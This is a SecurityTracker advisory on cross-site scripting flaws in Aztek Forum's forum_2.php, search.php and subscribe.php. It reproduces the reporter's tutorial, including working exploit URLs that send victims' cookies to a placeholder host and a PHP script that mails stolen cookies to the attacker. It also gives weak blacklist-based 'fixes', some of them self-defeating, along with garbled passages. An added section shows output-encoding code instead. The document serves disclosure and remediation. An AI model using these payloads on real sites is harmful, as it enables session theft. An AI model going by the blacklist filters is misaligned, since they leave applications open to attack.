SecurityTracker.com
SecurityTracker
Archives
Category: Application (Forum/Board/Portal) > Aztek Forum
Vendors: forum-aztek.com
Aztek Forum Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012213
SecurityTracker URL:  http://securitytracker.com/id/1012213
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 12 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   benjilenoob reported some input validation vulnerabilities in Aztek Forum. A remote user can conduct cross-site scripting attacks.

It is reported that several scripts do not properly validate user-supplied input to remove HTML code before displaying information based on the user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Aztek Forum software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

It is reported that 'forum_2.php' does not validate the 'return' and 'title' variables. A demonstration exploit URL is provided:

http://[target]/forum%20aztek/forum_2.php?msg=10&return=')%3C/script%3E%3Cscript%3E%20%20document.location=%20'www.site.com/code_evil.php?cookie='%20+window.document.cookie;%20%20%3C/script%3E

It is also reported that 'search.php' does not validate search queries.

It is also reported that 'subscribe.php' does not validate the 'email' variable.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Aztek Forum software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.forum-aztek.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  flaws in Aztek forum


XSS vulnerability in Forum Aztek:

Finding the vulnerability:

There is an XSS vulnerability in the $return variable:
http://www.victime.com/forum aztek/forum_2.php?msg=10&return=

So it is enough to read the source to notice that if we inject this:
')</script><script>alert(document.cookie)</script>
it displays the cookie perfectly!

So if we wanted to exploit the vulnerability, we would need a script like this:
<script>
document.location= 'www.site.com/code_evil.php?cookie=' 
+window.document.cookie;
</script>

And in the file code_evil.php:
<?php

$cokie = $_GET['cookie'];
mail('votre_email@hebergeur.com', 'You just stole a
cookie', $cokie);

?>

So the complete URL is:
http://www.victime.com/forum%20aztek/forum_2.php?msg=10&return=')%3C/script%3E%3Cscript%3E%20%20document.location=%20'www.site.com/code_evil.php?cookie='%20+window.document.cookie;%20%20%3C/script%3E

Fixing the vulnerability:

To fix it, it is enough to convert the dangerous characters into spaces:
// Replace each dangerous character or word with a space, in this order.
// str_replace() applies the array entries one after another, which is
// exactly what the original chain of single calls did.
$bad = array(
    "<", ">", "script", "?", ";", ":", "!", "=", "$", "%", "]", "[",
    "javascript", "*", ")", "(", "#", "_", "^", "|", "}", "{", "+", "-",
    "/", "&", "php", "PHP", "html", "body", "head", "title", "form",
);
$return = str_replace($bad, " ", $return);
// The original also called str_replace() with an empty search string,
// which is a no-op in PHP and is left out here.
// Strip the "%" from a few URL-encoded sequences. Because "%" itself was
// already blanked above, these replacements can never match.
$return = str_replace(
    array("%22", "%23", "%47", "%44", "%62", "%60", "%37"),
    array("22", "23", "47", "44", "62", "60", "37"),
    $return
);

So this code must go in /forum/main.php

##########################################

Search.php

Well, if you go to the part of the forum where you can run searches, you will notice that if you inject code such as: "><script>alert('salut')</script> then something very interesting happens on your page. Part of the source code will

no, because in the textbox where I put my code, part of the
search is called $search; I look a few lines further down and I see:
$search=str_replace("<","&lt;",$search); Well, from there I know that a
execute JavaScript, because the < characters are converted to &lt;
So, fine, from that point on I know it will be difficult
to execute JavaScript in this variable, but protecting only < is not
So to protect it, just put this code at the start of the source:

// Replace each dangerous character or word with a space, in this order
// (the same sequential blacklist as for $return, minus "<", which the
// script already converts to &lt;).
$bad = array(
    ">", "script", "?", ";", ":", "!", "=", "$", "%", "]", "[",
    "javascript", "*", ")", "(", "#", "_", "^", "|", "}", "{", "+", "-",
    "/", "&", "php", "PHP", "html", "body", "head", "title", "form",
);
$search = str_replace($bad, " ", $search);
// The original also called str_replace() with an empty search string,
// which is a no-op in PHP and is left out here.
// Strip the "%" from a few URL-encoded sequences. Because "%" itself was
// already blanked above, these replacements can never match.
$search = str_replace(
    array("%22", "%23", "%47", "%44", "%62", "%60", "%37"),
    array("22", "23", "47", "44", "62", "60", "37"),
    $search
);

This code must go in index/search.php
Now I am sure that this variable cannot be attacked, or at least that no
XSS can be found in it, which is very important because this kind of
vulnerability is terrible.

Security tutorial written by Benjilenoob

copyright(c)Project2400

Subscribe.php

Well, in the file subscribe.php we have the same type of risk as in
search.php, except that the danger comes from the $email variable, so it
following after this line:

function show_subscribe($login,$email){

code:

// Replace each dangerous character or word with a space, in this order
// (the same sequential blacklist as for $return). Note that this also
// removes "_", "-" and "+", which are legal in e-mail addresses.
$bad = array(
    "<", ">", "script", "?", ";", ":", "!", "=", "$", "%", "]", "[",
    "javascript", "*", ")", "(", "#", "_", "^", "|", "}", "{", "+", "-",
    "/", "&", "php", "PHP", "html", "body", "head", "title", "form",
);
$email = str_replace($bad, " ", $email);
// The original also called str_replace() with an empty search string,
// which is a no-op in PHP and is left out here.
// Strip the "%" from a few URL-encoded sequences. Because "%" itself was
// already blanked above, these replacements can never match.
$email = str_replace(
    array("%22", "%23", "%47", "%44", "%62", "%60", "%37"),
    array("22", "23", "47", "44", "62", "60", "37"),
    $email
);

This code must go in index/subscribe.php

Remember one thing: even if you think an attack on this variable is
impossible because it already filters <, that is not necessarily the case,
because people will always find a trick to get around it, so securing as
much as possible is best; I know this from experience. SECURITY IS PRICELESS

Security tutorial written by Benjilenoob

copyright(c)Project2400

Subscribe.php

Well, still in this same file, the other variables such as $login work the
same way as $email, so same problem, same solution. You only need to replace
$email with $login in the previous code and put the code right after it.
There, I think you should be

Security tutorial written by Benjilenoob
#############################################
XSS vulnerability in Aztek forum:

Finding the vulnerability:

There is a vulnerability in the $title variable:
http://www.victime.com/forum%20aztek/forum_2.php?choix=2&title=

It works like $return; just put the following code in it:
")><script>alert(document.cookie)</script>

With that, the attacker can grab the cookies and passwords of anyone going
to the page:
http://www.victime.com/forum%20aztek/forum_2.php?msg=10&title=')><script>%20%20document.location=%20'www.site.com/code_evil.php?cookie='%20+window.document.cookie;%20%20%3C/script%3E

Just put this in code_evil.php:
<?php

$cokie = $_GET['cookie'];
mail('votre_email@hebergeur.com', 'You just stole a
cookie', $cokie);

?>

How to fix the vulnerability:

Just put the following code in new_post.php to convert all the nasty
characters into spaces:
// Replace each dangerous character or word with a space, in this order
// (the same sequential blacklist as for $return).
$bad = array(
    "<", ">", "script", "?", ";", ":", "!", "=", "$", "%", "]", "[",
    "javascript", "*", ")", "(", "#", "_", "^", "|", "}", "{", "+", "-",
    "/", "&", "php", "PHP", "html", "body", "head", "title", "form",
);
$title = str_replace($bad, " ", $title);
// The original also called str_replace() with an empty search string,
// which is a no-op in PHP and is left out here.
// Strip the "%" from a few URL-encoded sequences. Because "%" itself was
// already blanked above, these replacements can never match.
$title = str_replace(
    array("%22", "%23", "%47", "%44", "%62", "%60", "%37"),
    array("22", "23", "47", "44", "62", "60", "37"),
    $title
);

Just put this code in the vulnerable file and presto, no more vulnerability.

This vulnerability is also present in inbox.php, so do the same thing to
fix it.
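The blacklists above remove characters rather than encode them. As an added example that is not part of the original message or of Aztek Forum, the snippet below shows the output-encoding approach a reviewer would recommend for the same parameters, using only PHP standard functions. The contexts are assumptions read off the quoted payloads: the leading ') in the 'return' and 'title' payloads suggests those values are echoed inside a JavaScript string in a <script> block, while the leading "> in the 'search' payload suggests a double-quoted HTML attribute; the function names esc_html, esc_js and safe_return are hypothetical.

```php
<?php
// Added example, not Aztek Forum code. Contexts are assumed from the
// advisory's payloads: return/title -> JS string literal, search -> HTML
// attribute. Encode for the context the value lands in instead of
// blacklisting characters.

// Value echoed inside an HTML tag body or a double-quoted attribute.
function esc_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Value echoed inside a JavaScript string literal in a <script> block.
// json_encode() produces a quoted literal; the HEX flags also encode
// < > & ' " so the output can never close the surrounding </script> tag.
function esc_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE | JSON_INVALID_UTF8_SUBSTITUTE);
}

// Assumption: 'return' is also used as a navigation target. Beyond encoding,
// restrict it to a simple relative path on this site; anything else falls
// back to the forum index rather than being echoed at all.
function safe_return(string $return): string {
    if (preg_match('#\A[A-Za-z0-9_./?=&-]+\z#', $return) !== 1
        || $return[0] === '/' || strpos($return, '..') !== false) {
        return 'index.php';
    }
    return $return;
}

// Constructed inputs, copied from the payloads quoted in the advisory.
$return = "')</script><script>alert(document.cookie)</script>";
$search = '"><script>alert(\'salut\')</script>';
$good   = 'forum_2.php?msg=10';

// safe_return() rejects the payload and keeps the legitimate path.
echo '<script>var back = ' . esc_js(safe_return($return)) . ';</script>', PHP_EOL;
echo '<script>var back = ' . esc_js(safe_return($good)) . ';</script>', PHP_EOL;
// The search payload is rendered as inert text inside the attribute.
echo '<input type="text" name="search" value="' . esc_html($search) . '">', PHP_EOL;
```

The same esc_html() call covers the 'email' and 'login' values in subscribe.php, which are plain attribute or tag-body output and need no character stripping at all.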



Copyright 2019, SecurityGlobal.net LLC